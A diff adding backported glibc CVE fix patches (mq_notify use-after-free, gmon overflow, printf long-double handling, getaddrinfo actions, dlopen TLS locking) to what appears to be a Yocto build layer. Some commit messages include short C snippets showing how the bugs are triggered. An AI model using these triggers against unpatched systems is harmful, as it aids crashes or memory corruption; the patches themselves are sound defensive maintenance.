+ size_t tls_free_end;
+ tls_free_start = tls_free_end = NO_TLS_OFFSET;
+
++ /* Protects global and module specitic TLS state. */
++ __rtld_lock_lock_recursive (GL(dl_load_tls_lock));
++
+ /* We modify the list of loaded objects. */
+ __rtld_lock_lock_recursive (GL(dl_load_write_lock));
+
+@@ -786,6 +789,9 @@
+ GL(dl_tls_static_used) = tls_free_start;
+ }
+
++ /* TLS is cleaned up for the unloaded modules. */
++ __rtld_lock_unlock_recursive (GL(dl_load_tls_lock));
++
+ #ifdef SHARED
+ /* Auditing checkpoint: we have deleted all objects. */
+ if (__glibc_unlikely (do_audit))
+diff --git a/elf/dl-open.c b/elf/dl-open.c
+index 5295e931b0..6ea5dd2457 100644
+--- a/elf/dl-open.c
++++ b/elf/dl-open.c
+@@ -57,6 +57,9 @@
+ (non-negative). */
+ unsigned int original_global_scope_pending_adds;
+
++ /* Set to true if the end of dl_open_worker_begin was reached. */
++ bool worker_continue;
++
+ /* Original parameters to the program and the current environment. */
+ int argc;
+ char **argv;
+@@ -473,7 +473,7 @@
+ }
+
+ static void
+-dl_open_worker (void *a)
++dl_open_worker_begin (void *a)
+ {
+ struct dl_open_args *args = a;
+ const char *file = args->file;
+@@ -747,6 +747,36 @@
+ if (mode & RTLD_GLOBAL)
+ add_to_global_resize (new);
+
++ args->worker_continue = true;
++}
++
++static void
++dl_open_worker (void *a)
++{
++ struct dl_open_args *args = a;
++
++ args->worker_continue = false;
++
++ {
++ /* Protects global and module specific TLS state. */
++ __rtld_lock_lock_recursive (GL(dl_load_tls_lock));
++
++ struct dl_exception ex;
++ int err = _dl_catch_exception (&ex, dl_open_worker_begin, args);
++
++ __rtld_lock_unlock_recursive (GL(dl_load_tls_lock));
++
++ if (__glibc_unlikely (ex.errstring != NULL))
++ /* Reraise the error. */
++ _dl_signal_exception (err, &ex, NULL);
++ }
++
++ if (!args->worker_continue)
++ return;
++
++ int mode = args->mode;
++ struct link_map *new = args->map;
++
+ /* Run the initializer functions of new objects. Temporarily
+ disable the exception handler, so that lazy binding failures are
+ fatal. */
+diff --git a/elf/dl-support.c b/elf/dl-support.c
+index 02e2ed72f5..d99c1f1d62 100644
+--- a/elf/dl-support.c
++++ b/elf/dl-support.c
+@@ -219,6 +219,13 @@
+ list of loaded objects while an object is added to or removed from
+ that list. */
+ __rtld_lock_define_initialized_recursive (, _dl_load_write_lock)
++/* This lock protects global and module specific TLS related data.
++ E.g. it is held in dlopen and dlclose when GL(dl_tls_generation),
++ GL(dl_tls_max_dtv_idx) or GL(dl_tls_dtv_slotinfo_list) are
++ accessed and when TLS related relocations are processed for a
++ module. It was introduced to keep pthread_create accessing TLS
++ state that is being set up. */
++__rtld_lock_define_initialized_recursive (, _dl_load_tls_lock)
+
+
+ #ifdef HAVE_AUX_VECTOR
+diff --git a/elf/dl-tls.c b/elf/dl-tls.c
+index d554ae4497..9260d2d696 100644
+--- a/elf/dl-tls.c
++++ b/elf/dl-tls.c
+@@ -443,7 +443,7 @@
+ size_t maxgen = 0;
+
+ /* Protects global dynamic TLS related state. */
+- __rtld_lock_lock_recursive (GL(dl_load_lock));
++ __rtld_lock_lock_recursive (GL(dl_load_tls_lock));
+
+ /* Check if the current dtv is big enough. */
+ if (dtv[-1].counter < GL(dl_tls_max_dtv_idx))
+@@ -517,7 +517,7 @@
+ listp = listp->next;
+ assert (listp != NULL);
+ }
+- __rtld_lock_unlock_recursive (GL(dl_load_lock));
++ __rtld_lock_unlock_recursive (GL(dl_load_tls_lock));
+
+ /* The DTV version is up-to-date now. */
+ dtv[0].counter = maxgen;
+@@ -656,7 +656,7 @@
+
+ Here the dtv needs to be updated to new_gen generation count.
+
+- This code may be called during TLS access when GL(dl_load_lock)
++ This code may be called during TLS access when GL(dl_load_tls_lock)
+ is not held. In that case the user code has to synchronize with
+ dlopen and dlclose calls of relevant modules. A module m is
+ relevant if the generation of m <= new_gen and dlclose of m is
+@@ -778,11 +778,11 @@
+ if (__glibc_unlikely (the_map->l_tls_offset
+ != FORCED_DYNAMIC_TLS_OFFSET))
+ {
+- __rtld_lock_lock_recursive (GL(dl_load_lock));
++ __rtld_lock_lock_recursive (GL(dl_load_tls_lock));
+ if (__glibc_likely (the_map->l_tls_offset == NO_TLS_OFFSET))
+ {
+ the_map->l_tls_offset = FORCED_DYNAMIC_TLS_OFFSET;
+- __rtld_lock_unlock_recursive (GL(dl_load_lock));
++ __rtld_lock_unlock_recursive (GL(dl_load_tls_lock));
+ }
+ else if (__glibc_likely (the_map->l_tls_offset
+ != FORCED_DYNAMIC_TLS_OFFSET))
+@@ -794,7 +794,7 @@
+ #else
+ # error "Either TLS_TCB_AT_TP or TLS_DTV_AT_TP must be defined"
+ #endif
+- __rtld_lock_unlock_recursive (GL(dl_load_lock));
++ __rtld_lock_unlock_recursive (GL(dl_load_tls_lock));
+
+ dtv[GET_ADDR_MODULE].pointer.to_free = NULL;
+ dtv[GET_ADDR_MODULE].pointer.val = p;
+@@ -802,7 +802,7 @@
+ return (char *) p + GET_ADDR_OFFSET;
+ }
+ else
+- __rtld_lock_unlock_recursive (GL(dl_load_lock));
++ __rtld_lock_unlock_recursive (GL(dl_load_tls_lock));
+ }
+ struct dtv_pointer result = allocate_and_init (the_map);
+ dtv[GET_ADDR_MODULE].pointer = result;
+@@ -873,7 +873,7 @@
+ return NULL;
+
+ dtv_t *dtv = THREAD_DTV ();
+- /* This may be called without holding the GL(dl_load_lock). Reading
++ /* This may be called without holding the GL(dl_load_tls_lock). Reading
+ arbitrary gen value is fine since this is best effort code. */
+ size_t gen = atomic_load_relaxed (&GL(dl_tls_generation));
+ if (__glibc_unlikely (dtv[0].counter != gen))
+diff --git a/elf/rtld.c b/elf/rtld.c
+index 8d2bba3d43..9642eb9c92 100644
+--- a/elf/rtld.c
++++ b/elf/rtld.c
+@@ -283,6 +283,7 @@
+ #ifdef _LIBC_REENTRANT
+ ._dl_load_lock = _RTLD_LOCK_RECURSIVE_INITIALIZER,
+ ._dl_load_write_lock = _RTLD_LOCK_RECURSIVE_INITIALIZER,
++ ._dl_load_tls_lock = _RTLD_LOCK_RECURSIVE_INITIALIZER,
+ #endif
+ ._dl_nns = 1,
+ ._dl_ns =
+diff --git a/sysdeps/nptl/fork.c b/sysdeps/nptl/fork.c
+index c471f7b15f..021691b9b7 100644
+--- a/sysdeps/nptl/fork.c
++++ b/sysdeps/nptl/fork.c
+@@ -125,6 +125,9 @@
+ /* Reset the lock the dynamic loader uses to protect its data. */
+ __rtld_lock_initialize (GL(dl_load_lock));
+
++ /* Reset the lock protecting dynamic TLS related data. */
++ __rtld_lock_initialize (GL(dl_load_tls_lock));
++
+ /* Run the handlers registered for the child. */
+ __run_fork_handlers (atfork_run_child, multiple_threads);
+ }
+diff --git a/sysdeps/generic/ldsodefs.h b/sysdeps/generic/ldsodefs.h
+index d49529da0d..9ec1511bb0 100644
+--- a/sysdeps/generic/ldsodefs.h
++++ b/sysdeps/generic/ldsodefs.h
+@@ -369,6 +369,13 @@
+ list of loaded objects while an object is added to or removed
+ from that list. */
+ __rtld_lock_define_recursive (EXTERN, _dl_load_write_lock)
++ /* This lock protects global and module specific TLS related data.
++ E.g. it is held in dlopen and dlclose when GL(dl_tls_generation),
++ GL(dl_tls_max_dtv_idx) or GL(dl_tls_dtv_slotinfo_list) are
++ accessed and when TLS related relocations are processed for a
++ module. It was introduced to keep pthread_create accessing TLS
++ state that is being set up. */
++ __rtld_lock_define_recursive (EXTERN, _dl_load_tls_lock)
+
+ /* Incremented whenever something may have been added to dl_loaded. */
+ EXTERN unsigned long long _dl_load_adds;
+@@ -1153,7 +1160,7 @@
+
+ /* Add module to slot information data. If DO_ADD is false, only the
+ required memory is allocated. Must be called with GL
+- (dl_load_lock) acquired. If the function has already been called
++ (dl_load_tls_lock) acquired. If the function has already been called
+ for the link map L with !do_add, then this function will not raise
+ an exception, otherwise it is possible that it encounters a memory
+ allocation failure. */
+--
+2.27.0
diff --git a/meta/recipes-core/glibc/glibc/CVE-2020-29573.patch b/meta/recipes-core/glibc/glibc/CVE-2020-29573.patch
new file mode 100644
index 0000000000..1e75f2d29d
--- /dev/null
+++ b/meta/recipes-core/glibc/glibc/CVE-2020-29573.patch
@@ -0,0 +1,128 @@
+From 681900d29683722b1cb0a8e565a0585846ec5a61 Mon Sep 17 00:00:00 2001
+From: Florian Weimer <fweimer@redhat.com>
+Date: Tue, 22 Sep 2020 19:07:48 +0200
+Subject: [PATCH] x86: Harden printf against non-normal long double values (bug
+ 26649)
+
+The behavior of isnan/__builtin_isnan on bit patterns that do not
+correspond to something that the CPU would produce from valid inputs
+is currently under-defined in the toolchain. (The GCC built-in and
+glibc disagree.)
+
+The isnan check in PRINTF_FP_FETCH in stdio-common/printf_fp.c
+assumes the GCC behavior that returns true for non-normal numbers
+which are not specified as NaN. (The glibc implementation returns
+false for such numbers.)
+
+At present, passing non-normal numbers to __mpn_extract_long_double
+causes this function to produce irregularly shaped multi-precision
+integers, triggering undefined behavior in __printf_fp_l.
+
+With GCC 10 and glibc 2.32, this behavior is not visible because
+__builtin_isnan is used, which avoids calling
+__mpn_extract_long_double in this case. This commit updates the
+implementation of __mpn_extract_long_double so that regularly shaped
+multi-precision integers are produced in this case, avoiding
+undefined behavior in __printf_fp_l.
+
+Upstream-Status: Backport [git://sourceware.org/git/glibc.git]
+CVE: CVE-2020-29573
+Signed-off-by: Armin Kuster <akuster@mvista.com>
+
+---
+ sysdeps/x86/Makefile | 4 ++
+ sysdeps/x86/ldbl2mpn.c | 8 ++++
+ sysdeps/x86/tst-ldbl-nonnormal-printf.c | 52 +++++++++++++++++++++++++
+ 3 files changed, 64 insertions(+)
+ create mode 100644 sysdeps/x86/tst-ldbl-nonnormal-printf.c
+
+Index: git/sysdeps/x86/Makefile
+===================================================================
+--- git.orig/sysdeps/x86/Makefile
++++ git/sysdeps/x86/Makefile
+@@ -9,6 +9,10 @@ tests += tst-get-cpu-features tst-get-cp
+ tests-static += tst-get-cpu-features-static
+ endif
+
++ifeq ($(subdir),math)
++tests += tst-ldbl-nonnormal-printf
++endif # $(subdir) == math
++
+ ifeq ($(subdir),setjmp)
+ gen-as-const-headers += jmp_buf-ssp.sym
+ sysdep_routines += __longjmp_cancel
+Index: git/sysdeps/x86/tst-ldbl-nonnormal-printf.c
+===================================================================
+--- /dev/null
++++ git/sysdeps/x86/tst-ldbl-nonnormal-printf.c
+@@ -0,0 +1,52 @@
++/* Test printf with x86-specific non-normal long double value.
++ Copyright (C) 2020 Free Software Foundation, Inc.
++
++ This file is part of the GNU C Library.
++
++ The GNU C Library is free software; you can redistribute it and/or
++ modify it under the terms of the GNU Lesser General Public
++ License as published by the Free Software Foundation; either
++ version 2.1 of the License, or (at your option) any later version.
++
++ The GNU C Library is distributed in the hope that it will be useful,
++ but WITHOUT ANY WARRANTY; without even the implied warranty of
++ MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
++ Lesser General Public License for more details.
++
++ You should have received a copy of the GNU Lesser General Public
++ License along with the GNU C Library; if not, see
++ <https://www.gnu.org/licenses/>. */
++
++#include <stdio.h>
++#include <string.h>
++#include <support/check.h>
++
++/* Fill the stack with non-zero values. This makes a crash in
++ snprintf more likely. */
++static void __attribute__ ((noinline, noclone))
++fill_stack (void)
++{
++ char buffer[65536];
++ memset (buffer, 0xc0, sizeof (buffer));
++ asm ("" ::: "memory");
++}
++
++static int
++do_test (void)
++{
++ fill_stack ();
++
++ long double value;
++ memcpy (&value, "\x00\x04\x00\x00\x00\x00\x00\x00\x00\x04", 10);
++
++ char buf[30];
++ int ret = snprintf (buf, sizeof (buf), "%Lg", value);
++ TEST_COMPARE (ret, strlen (buf));
++ if (strcmp (buf, "nan") != 0)
++ /* If snprintf does not recognize the non-normal number as a NaN,
++ it has added the missing explicit MSB. */
++ TEST_COMPARE_STRING (buf, "3.02201e-4624");
++ return 0;
++}
++
++#include <support/test-driver.c>
+Index: git/sysdeps/i386/ldbl2mpn.c
+===================================================================
+--- git.orig/sysdeps/i386/ldbl2mpn.c
++++ git/sysdeps/i386/ldbl2mpn.c
+@@ -115,6 +115,12 @@ __mpn_extract_long_double (mp_ptr res_pt
+ && res_ptr[N - 1] == 0)
+ /* Pseudo zero. */
+ *expt = 0;
+-
++ else
++ /* The sign bit is explicit, but add it in case it is missing in
++ the input. Otherwise, callers will not be able to produce the
++ expected multi-precision integer layout by shifting the sign
++ bit into the MSB. */
++ res_ptr[N - 1] |= (mp_limb_t) 1 << (LDBL_MANT_DIG - 1
++ - ((N - 1) * BITS_PER_MP_LIMB));
+ return N;
+ }
diff --git a/meta/recipes-core/glibc/glibc/CVE-2021-33574_1.patch b/meta/recipes-core/glibc/glibc/CVE-2021-33574_1.patch
new file mode 100644
index 0000000000..7561e87121
--- /dev/null
+++ b/meta/recipes-core/glibc/glibc/CVE-2021-33574_1.patch
@@ -0,0 +1,68 @@
+From 42d359350510506b87101cf77202fefcbfc790cb Mon Sep 17 00:00:00 2001
+From: Andreas Schwab <schwab@linux-m68k.org>
+Date: Thu, 27 May 2021 12:49:47 +0200
+Subject: [PATCH] Use __pthread_attr_copy in mq_notify (bug 27896)
+
+Make a deep copy of the pthread attribute object to remove a potential
+use-after-free issue.
+
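+For context, an editorial sketch (not part of the patch) of why a plain memcpy
+is not enough: the caller owns the attribute object and may destroy it right
+after mq_notify() returns, yet the helper thread keeps using the copy, which
+still points at caller-owned data such as an affinity mask. All names below
+are illustrative:
+
+  #define _GNU_SOURCE 1
+  #include <mqueue.h>
+  #include <pthread.h>
+  #include <sched.h>
+  #include <signal.h>
+
+  static void handler (union sigval sv) { (void) sv; }
+
+  static void register_notification (mqd_t mqdes)
+  {
+    pthread_attr_t attr;
+    cpu_set_t cpus;
+    CPU_ZERO (&cpus);
+    CPU_SET (0, &cpus);
+
+    pthread_attr_init (&attr);
+    pthread_attr_setaffinity_np (&attr, sizeof cpus, &cpus);
+
+    struct sigevent sev = { .sigev_notify = SIGEV_THREAD,
+                            .sigev_notify_function = handler,
+                            .sigev_notify_attributes = &attr };
+    mq_notify (mqdes, &sev);
+
+    /* Legal for the caller, but with a shallow copy inside mq_notify the
+       helper thread may later read memory released here.  */
+    pthread_attr_destroy (&attr);
+  }
+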
+Upstream-Status: Backport
+CVE: CVE-2021-33574 patch#1
+Signed-off-by: Armin Kuster <akuster@mvista.com>
+
+---
+diff --git a/NEWS b/NEWS
+index 8a20d3c4e3..be489243ac 100644
+--- a/NEWS
++++ b/NEWS
+@@ -7,6 +7,10 @@ using `glibc' in the "product" field.
+
+ Version 2.31.1
+
++ CVE-2021-33574: The mq_notify function has a potential use-after-free
++ issue when using a notification type of SIGEV_THREAD and a thread
++ attribute with a non-default affinity mask.
++
+ The following bugs are resolved with this release:
+ [14231] stdio-common tests memory requirements
+ [19519] iconv(1) with -c option hangs on illegal multi-byte sequences
+diff --git a/sysdeps/unix/sysv/linux/mq_notify.c b/sysdeps/unix/sysv/linux/mq_notify.c
+index f288bac477..dd47f0b777 100644
+--- a/sysdeps/unix/sysv/linux/mq_notify.c
++++ b/sysdeps/unix/sysv/linux/mq_notify.c
+@@ -135,8 +135,11 @@ helper_thread (void *arg)
+ (void) __pthread_barrier_wait (&notify_barrier);
+ }
+ else if (data.raw[NOTIFY_COOKIE_LEN - 1] == NOTIFY_REMOVED)
+- /* The only state we keep is the copy of the thread attributes. */
+- free (data.attr);
++ {
++ /* The only state we keep is the copy of the thread attributes. */
++ pthread_attr_destroy (data.attr);
++ free (data.attr);
++ }
+ }
+ return NULL;
+ }
+@@ -257,8 +260,7 @@ mq_notify (mqd_t mqdes, const struct sigevent *notification)
+ if (data.attr == NULL)
+ return -1;
+
+- memcpy (data.attr, notification->sigev_notify_attributes,
+- sizeof (pthread_attr_t));
++ __pthread_attr_copy (data.attr, notification->sigev_notify_attributes);
+ }
+
+ /* Construct the new request. */
+@@ -272,7 +274,10 @@ mq_notify (mqd_t mqdes, const struct sigevent *notification)
+
+ /* If it failed, free the allocated memory. */
+ if (__glibc_unlikely (retval != 0))
+- free (data.attr);
++ {
++ pthread_attr_destroy (data.attr);
++ free (data.attr);
++ }
+
+ return retval;
+ }
diff --git a/meta/recipes-core/glibc/glibc/CVE-2021-33574_2.patch b/meta/recipes-core/glibc/glibc/CVE-2021-33574_2.patch
new file mode 100644
index 0000000000..396cd7fc0e
--- /dev/null
+++ b/meta/recipes-core/glibc/glibc/CVE-2021-33574_2.patch
@@ -0,0 +1,73 @@
+From 217b6dc298156bdb0d6aea9ea93e7e394a5ff091 Mon Sep 17 00:00:00 2001
+From: Florian Weimer <fweimer@redhat.com>
+Date: Tue, 1 Jun 2021 17:51:41 +0200
+Subject: [PATCH] Fix use of __pthread_attr_copy in mq_notify (bug 27896)
+
+__pthread_attr_copy can fail and does not initialize the attribute
+structure in that case.
+
+If __pthread_attr_copy is never called and there is no allocated
+attribute, pthread_attr_destroy should not be called, otherwise
+there is a null pointer dereference in rt/tst-mqueue6.
+
+Fixes commit 42d359350510506b87101cf77202fefcbfc790cb
+("Use __pthread_attr_copy in mq_notify (bug 27896)").
+
+Reviewed-by: Siddhesh Poyarekar <siddhesh@sourceware.org>
+
+https://sourceware.org/bugzilla/attachment.cgi?id=13497
+
+Upstream-Status: Backport
+CVE: CVE-2021-33574 patch#2
+Signed-off-by: Armin Kuster <akuster@mvista.com>
+
+---
+Index: git/sysdeps/unix/sysv/linux/mq_notify.c
+===================================================================
+--- git.orig/sysdeps/unix/sysv/linux/mq_notify.c
++++ git/sysdeps/unix/sysv/linux/mq_notify.c
+@@ -260,7 +260,34 @@ mq_notify (mqd_t mqdes, const struct sig
+ if (data.attr == NULL)
+ return -1;
+
+- __pthread_attr_copy (data.attr, notification->sigev_notify_attributes);
++ memcpy (data.attr, notification->sigev_notify_attributes,
++ sizeof (pthread_attr_t));
++
++ struct pthread_attr *source =
++ (struct pthread_attr *) (notification->sigev_notify_attributes);
++ struct pthread_attr *target = (struct pthread_attr *) (data.attr);
++ cpu_set_t *newp;
++ cpu_set_t *cpuset = source->cpuset;
++ size_t cpusetsize = source->cpusetsize;
++
++ /* alloc a new memory for cpuset to avoid use after free */
++ if (cpuset != NULL && cpusetsize > 0)
++ {
++ newp = (cpu_set_t *) malloc (cpusetsize);
++ if (newp == NULL)
++ {
++ free(data.attr);
++ return -1;
++ }
++
++ memcpy (newp, cpuset, cpusetsize);
++ target->cpuset = newp;
++ }
++ else
++ {
++ target->cpuset = NULL;
++ target->cpusetsize = 0;
++ }
+ }
+
+ /* Construct the new request. */
+@@ -273,7 +300,7 @@ mq_notify (mqd_t mqdes, const struct sig
+ int retval = INLINE_SYSCALL (mq_notify, 2, mqdes, &se);
+
+ /* If it failed, free the allocated memory. */
+- if (__glibc_unlikely (retval != 0))
++ if (retval != 0 && data.attr != NULL)
+ {
+ pthread_attr_destroy (data.attr);
+ free (data.attr);
diff --git a/meta/recipes-core/glibc/glibc/CVE-2021-38604.patch b/meta/recipes-core/glibc/glibc/CVE-2021-38604.patch
new file mode 100644
index 0000000000..36fd4a61b2
--- /dev/null
+++ b/meta/recipes-core/glibc/glibc/CVE-2021-38604.patch
@@ -0,0 +1,41 @@
+From b805aebd42364fe696e417808a700fdb9800c9e8 Mon Sep 17 00:00:00 2001
+From: Nikita Popov <npv1310@gmail.com>
+Date: Mon, 9 Aug 2021 20:17:34 +0530
+Subject: [PATCH] librt: fix NULL pointer dereference (bug 28213)
+
+The helper thread frees the copied attribute on a NOTIFY_REMOVED message
+received from the OS kernel. Unfortunately, it fails to check whether the
+copied attribute actually exists (data.attr != NULL). This worked
+earlier because free() checks the passed pointer before actually
+attempting to release the corresponding memory. But
+__pthread_attr_destroy assumes the pointer is not NULL.
+
+So passing a NULL pointer to __pthread_attr_destroy will result in a
+segmentation fault. This scenario is possible if
+notification->sigev_notify_attributes == NULL (which means default
+thread attributes should be used).
+
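+An illustrative (editorial) trigger: default attributes are enough to reach
+the broken path once the kernel reports NOTIFY_REMOVED for the registration.
+
+  #include <mqueue.h>
+  #include <signal.h>
+
+  static void handler (union sigval sv) { (void) sv; }
+
+  static void register_default (mqd_t mqdes)
+  {
+    struct sigevent sev = { .sigev_notify = SIGEV_THREAD,
+                            .sigev_notify_function = handler,
+                            .sigev_notify_attributes = NULL };  /* defaults */
+    mq_notify (mqdes, &sev);
+    /* If the kernel later sends NOTIFY_REMOVED for this registration, the
+       helper thread used to call pthread_attr_destroy (NULL) and crash.  */
+  }
+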
+Signed-off-by: Nikita Popov <npv1310@gmail.com>
+Reviewed-by: Siddhesh Poyarekar <siddhesh@sourceware.org>
+
+Upstream-Status: Backport
+CVE: CVE-2021-38604
+Signed-off-by: Armin Kuster <akuster@mvista.com>
+
+---
+ sysdeps/unix/sysv/linux/mq_notify.c | 2 +-
+ 1 file changed, 1 insertion(+), 1 deletion(-)
+
+Index: git/sysdeps/unix/sysv/linux/mq_notify.c
+===================================================================
+--- git.orig/sysdeps/unix/sysv/linux/mq_notify.c
++++ git/sysdeps/unix/sysv/linux/mq_notify.c
+@@ -134,7 +134,7 @@ helper_thread (void *arg)
+ to wait until it is done with it. */
+ (void) __pthread_barrier_wait (&notify_barrier);
+ }
+- else if (data.raw[NOTIFY_COOKIE_LEN - 1] == NOTIFY_REMOVED)
++ else if (data.raw[NOTIFY_COOKIE_LEN - 1] == NOTIFY_REMOVED && data.attr != NULL)
+ {
+ /* The only state we keep is the copy of the thread attributes. */
+ pthread_attr_destroy (data.attr);
diff --git a/meta/recipes-core/glibc/glibc/CVE-2023-0687.patch b/meta/recipes-core/glibc/glibc/CVE-2023-0687.patch
new file mode 100644
index 0000000000..10c7e5666d
--- /dev/null
+++ b/meta/recipes-core/glibc/glibc/CVE-2023-0687.patch
@@ -0,0 +1,82 @@
+From 952aff5c00ad7c6b83c3f310f2643939538827f8 Mon Sep 17 00:00:00 2001
+From: =?UTF-8?q?=D0=9B=D0=B5=D0=BE=D0=BD=D0=B8=D0=B4=20=D0=AE=D1=80=D1=8C?=
+ =?UTF-8?q?=D0=B5=D0=B2=20=28Leonid=20Yuriev=29?= <leo@yuriev.ru>
+Date: Sat, 4 Feb 2023 14:41:38 +0300
+Subject: [PATCH] gmon: Fix allocated buffer overflow (bug 29444)
+MIME-Version: 1.0
+Content-Type: text/plain; charset=UTF-8
+Content-Transfer-Encoding: 8bit
+
+The `__monstartup()` allocates a buffer used to store all the data
+accumulated by the monitor.
+
+The size of this buffer depends on the size of the internal structures
+used and the address range for which the monitor is activated, as well
+as on the maximum density of call instructions and/or callable functions
+that could be potentially on a segment of executable code.
+
+In particular a hash table of arcs is placed at the end of this buffer.
+The size of this hash table is calculated in bytes as
+ p->fromssize = p->textsize / HASHFRACTION;
+
+but actually should be
+ p->fromssize = ROUNDUP(p->textsize / HASHFRACTION, sizeof(*p->froms));
+
+This results in writing beyond the end of the allocated buffer when an
+added arc corresponds to a call near the end of the monitored
+address range, since `_mcount()` checks the incoming caller address
+against the monitored range but not the intermediate hash-like index
+that it uses to write into the table.
+
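+A worked example (editorial, with assumed values: 8-byte froms entries and
+HASHFRACTION == 2). For p->textsize = 1000 the old formula gives
+
+  p->fromssize = 1000 / 2 = 500 bytes     (62 whole entries plus 4 spare bytes)
+
+while _mcount() indexes the table with
+frompc / (HASHFRACTION * sizeof (*p->froms)), i.e. frompc / 16 here, so a
+caller near the end of the range can select entry 62, which occupies bytes
+496..503 and spills 4 bytes past the 500-byte allocation. With the fix,
+
+  p->fromssize = ROUNDUP(1000 / 2, 8) = 504 bytes
+
+and entry 62 fits within the buffer.
+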
+It should be noted that when the results are output to `gmon.out`, the
+table is read to the last element calculated from the allocated size in
+bytes, so the arcs stored outside the buffer boundary did not fall into
+`gprof` for analysis. Thus this "feature" helped me to find this bug
+while working with https://sourceware.org/bugzilla/show_bug.cgi?id=29438
+
+Just in case, I will explicitly note that the problem breaks the
+`make test t=gmon/tst-gmon-dso` added for Bug 29438.
+There, the arc of the `f3()` call disappears from the output, since in
+the DSO case, the call to `f3` is located close to the end of the
+monitored range.
+
+Signed-off-by: Леонид Юрьев (Leonid Yuriev) <leo@yuriev.ru>
+
+Another minor error seems to be a related typo in the calculation of
+`kcountsize`, but since kcounts are smaller than froms, this is
+actually to align the p->froms data.
+
+Co-authored-by: DJ Delorie <dj@redhat.com>
+Reviewed-by: Carlos O'Donell <carlos@redhat.com>
+
+Upstream-Status: Backport [https://sourceware.org/git/?p=glibc.git;a=commit;h=801af9fafd4689337ebf27260aa115335a0cb2bc]
+CVE: CVE-2023-0687
+Signed-off-by: Shubham Kulkarni <skulkarni@mvista.com>
+---
+ gmon/gmon.c | 4 +++-
+ 1 file changed, 3 insertions(+), 1 deletion(-)
+
+diff --git a/gmon/gmon.c b/gmon/gmon.c
+index dee6480..bf76358 100644
+--- a/gmon/gmon.c
++++ b/gmon/gmon.c
+@@ -132,6 +132,8 @@ __monstartup (u_long lowpc, u_long highpc)
+ p->lowpc = ROUNDDOWN(lowpc, HISTFRACTION * sizeof(HISTCOUNTER));
+ p->highpc = ROUNDUP(highpc, HISTFRACTION * sizeof(HISTCOUNTER));
+ p->textsize = p->highpc - p->lowpc;
++ /* This looks like a typo, but it's here to align the p->froms
++ section. */
+ p->kcountsize = ROUNDUP(p->textsize / HISTFRACTION, sizeof(*p->froms));
+ p->hashfraction = HASHFRACTION;
+ p->log_hashfraction = -1;
+@@ -142,7 +144,7 @@ __monstartup (u_long lowpc, u_long highpc)
+ instead of integer division. Precompute shift amount. */
+ p->log_hashfraction = ffs(p->hashfraction * sizeof(*p->froms)) - 1;
+ }
+- p->fromssize = p->textsize / HASHFRACTION;
++ p->fromssize = ROUNDUP(p->textsize / HASHFRACTION, sizeof(*p->froms));
+ p->tolimit = p->textsize * ARCDENSITY / 100;
+ if (p->tolimit < MINARCS)
+ p->tolimit = MINARCS;
+--
+2.7.4
diff --git a/meta/recipes-core/glibc/glibc/CVE-2023-4813.patch b/meta/recipes-core/glibc/glibc/CVE-2023-4813.patch
new file mode 100644
index 0000000000..c7db4038c2
--- /dev/null
+++ b/meta/recipes-core/glibc/glibc/CVE-2023-4813.patch
@@ -0,0 +1,986 @@
+From 1c37b8022e8763fedbb3f79c02e05c6acfe5a215 Mon Sep 17 00:00:00 2001
+From: Siddhesh Poyarekar <siddhesh@sourceware.org>
+Date: Thu, 17 Mar 2022 11:44:34 +0530
+Subject: [PATCH] Simplify allocations and fix merge and continue actions [BZ
+ #28931]
+
+Allocations for address tuples are currently a bit confusing because of
+the pointer chasing through PAT, making it hard to observe the sequence
+in which allocations have been made. Narrow the scope of the pointer
+chasing through PAT so that it is only used where necessary.
+
+This also tightens actions behaviour with the hosts database in
+getaddrinfo to comply with the manual text. The "continue" action
+discards previous results and the "merge" action results in an immediate
+lookup failure. Consequently, chaining of allocations across modules is
+no longer necessary, thus opening up cleanup opportunities.
+
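+For reference (editorial note), these are the actions that can be written
+after a service in /etc/nsswitch.conf, for example:
+
+  hosts: files [SUCCESS=continue] dns   # consult dns even after files succeeds
+  hosts: files [SUCCESS=merge] dns      # merge is mainly meant for e.g. group
+
+With this change, getaddrinfo discards earlier results on "continue" and fails
+the lookup outright on "merge", matching the documented hosts semantics.
+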
+A test has been added that checks some combinations to ensure that they
+work correctly.
+
+Resolves: BZ #28931
+
+CVE: CVE-2023-4813
+Upstream-Status: Backport [https://sourceware.org/git/?p=glibc.git;a=commitdiff;h=1c37b8022e8763fedbb3f79c02e05c6acfe5a215]
+Comments: Hunks refreshed
+
+Signed-off-by: Siddhesh Poyarekar <siddhesh@sourceware.org>
+Reviewed-by: DJ Delorie <dj@redhat.com>
+Signed-off-by: Bhabu Bindu <bhabu.bindu@kpit.com>
+---
+ nss/Makefile | 1 +
+ nss/tst-nss-gai-actions.c | 149 ++++++
+ nss/tst-nss-gai-actions.root/etc/host.conf | 1 +
+ nss/tst-nss-gai-actions.root/etc/hosts | 508 +++++++++++++++++++++
+ sysdeps/posix/getaddrinfo.c | 143 +++---
+ 5 files changed, 750 insertions(+), 52 deletions(-)
+ create mode 100644 nss/tst-nss-gai-actions.c
+ create mode 100644 nss/tst-nss-gai-actions.root/etc/host.conf
+ create mode 100644 nss/tst-nss-gai-actions.root/etc/hosts
+
+diff --git a/nss/Makefile b/nss/Makefile
+index 42a59535cb..d8b06b44fb 100644
+--- a/nss/Makefile
++++ b/nss/Makefile
+@@ -61,6 +61,7 @@
+
+ tests-container = \
+ tst-nss-test3 \
++ tst-nss-gai-actions \
+ tst-nss-files-hosts-long \
+ tst-nss-db-endpwent \
+ tst-nss-db-endgrent
+diff --git a/nss/tst-nss-gai-actions.c b/nss/tst-nss-gai-actions.c
+new file mode 100644
+index 0000000000..efca6cd183
+--- /dev/null
++++ b/nss/tst-nss-gai-actions.c
+@@ -0,0 +1,149 @@
++/* Test continue and merge NSS actions for getaddrinfo.
++ Copyright The GNU Toolchain Authors.
++ This file is part of the GNU C Library.
++
++ The GNU C Library is free software; you can redistribute it and/or
++ modify it under the terms of the GNU Lesser General Public
++ License as published by the Free Software Foundation; either
++ version 2.1 of the License, or (at your option) any later version.
++
++ The GNU C Library is distributed in the hope that it will be useful,
++ but WITHOUT ANY WARRANTY; without even the implied warranty of
++ MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
++ Lesser General Public License for more details.
++
++ You should have received a copy of the GNU Lesser General Public
++ License along with the GNU C Library; if not, see
++ <https://www.gnu.org/licenses/>. */
++
++#include <dlfcn.h>
++#include <gnu/lib-names.h>
++#include <nss.h>
++#include <stdio.h>
++#include <stdlib.h>
++#include <string.h>
++
++#include <support/check.h>
++#include <support/format_nss.h>
++#include <support/support.h>
++#include <support/xstdio.h>
